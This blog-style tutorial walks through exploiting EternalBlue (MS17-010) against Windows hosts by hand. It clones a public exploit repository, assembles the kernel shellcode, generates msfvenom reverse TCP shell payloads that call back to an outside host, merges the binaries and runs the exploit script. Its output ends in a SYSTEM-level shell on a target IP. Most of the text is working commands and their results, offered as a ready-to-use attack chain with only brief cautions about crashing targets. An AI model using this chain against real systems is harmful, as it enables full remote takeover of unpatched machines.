MS17-010 EternalBlue Manual Exploitation

Published:

Introduction

In this post we’ll see how EternalBlue (MS17-010) can be exploited manually by compiling the payload from source and running it against a vulnerable target. This is useful in situations where Metasploit is not available or not an option, like running quick demos or exploiting from C2 hosts. Unlike “zzz_exploit” this method does not require access to a named pipe, nor does it require any credentials. However, the downside to this is an increased risk of crashing the target so please use with caution. Big thanks Worawit Wang for developing the shellcodes and making them public.

Obtaining the shellcodes

Clone the following repo to obtain the kernel shellcodes

git clone https://github.com/worawit/MS17-010.git

Our point of interest are the shellcodes (.asm) located in MS17-010/shellcode which we must compile in order to make them executable.

$ ls MS17-010/shellcode | grep shellcode
eternalblue_kshellcode_x64.asm
eternalblue_kshellcode_x86.asm

As you can see there are two .asm files in this folder; one for x64 and one for x86. Which one you choose is dependent on the architecture of your target. If you are unsure or if you just want a payload that works on both architectures then i suggest compiling shellcodes for both architectures and later merge them as explained in the optional section below.

Compiling the shellcode(s)

Run the appropriate command to assemble shellcodes with nasm

x64

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

x86

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Doing so will output the binary for your chosen arch which contains everything needed to exploit the infamous vulnerability - which is great, however, not very useful unless it also contains some evil code which is to be executed once the vulnerability itself has been exploited. This “evil code” can be any binary that you desire, provided it’s compiled for the correct architecture as well.

To accomplish that we must combine both the kernel exploit and the payload into a single binary. For the sake of this example I’ll use msfvenom to generate a simple reverse tcp shell payload.

x64

$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin

x86

$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=elliot.sh --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin

Concentrating binaries

By now you should have at least one *_kernel.bin and one *_payload_bin sitting in your directory. Use cat to merge them as one.

x64

cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

x86

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

x64 and x86 in one binary (optional)

Provided you have compiled binaries for both architectures (and want them both in your payload) then merge them together with the included eternalblue_sc_merge.py script located in the shellcode/ folder

python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Exploiting the target

By now you should have one binary containing both the kernel exploit and your evil payload. To run the exploit, you must use one of the provided eternalblue_exploit scripts located in the MS17-010/ folder

$ ls MS17-010 | grep eternalblue_exploit
eternalblue_exploit7.py
eternalblue_exploit8.py

To decide which script to use you must first consider the target OS. If you don’t know then you better be a working professional sitting a test environment running these blindly target is a bad idea. If anything, expect your target to crash or force reboot once the session is closed.

eternalblue_exploit8.py

  • Windows Server 2012 (x64)
  • Windows 8.1 & RT
  • Windows 10 (x64) (build < 14393)

eternalblue_exploit7.py

  • Windows Server 2008 & R2
  • Windows Server 2012 & R2 (x86)
  • Windows Server 2016 (x64)
  • Windows Vista
  • Windows 7

Running exploit

python MS17-010/eternalblue_exploit7.py <target_IP> final.bin

Example running against vulnerable Windows 7 host:

$ python MS17-010/eternalblue_exploit7.py 3.123.3.123 sc_all.bin
$ nc -lvnp 443
listening on [any] 443 ...
connect to [18.197.212.241] from (UNKNOWN) [3.123.3.123] 49191
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system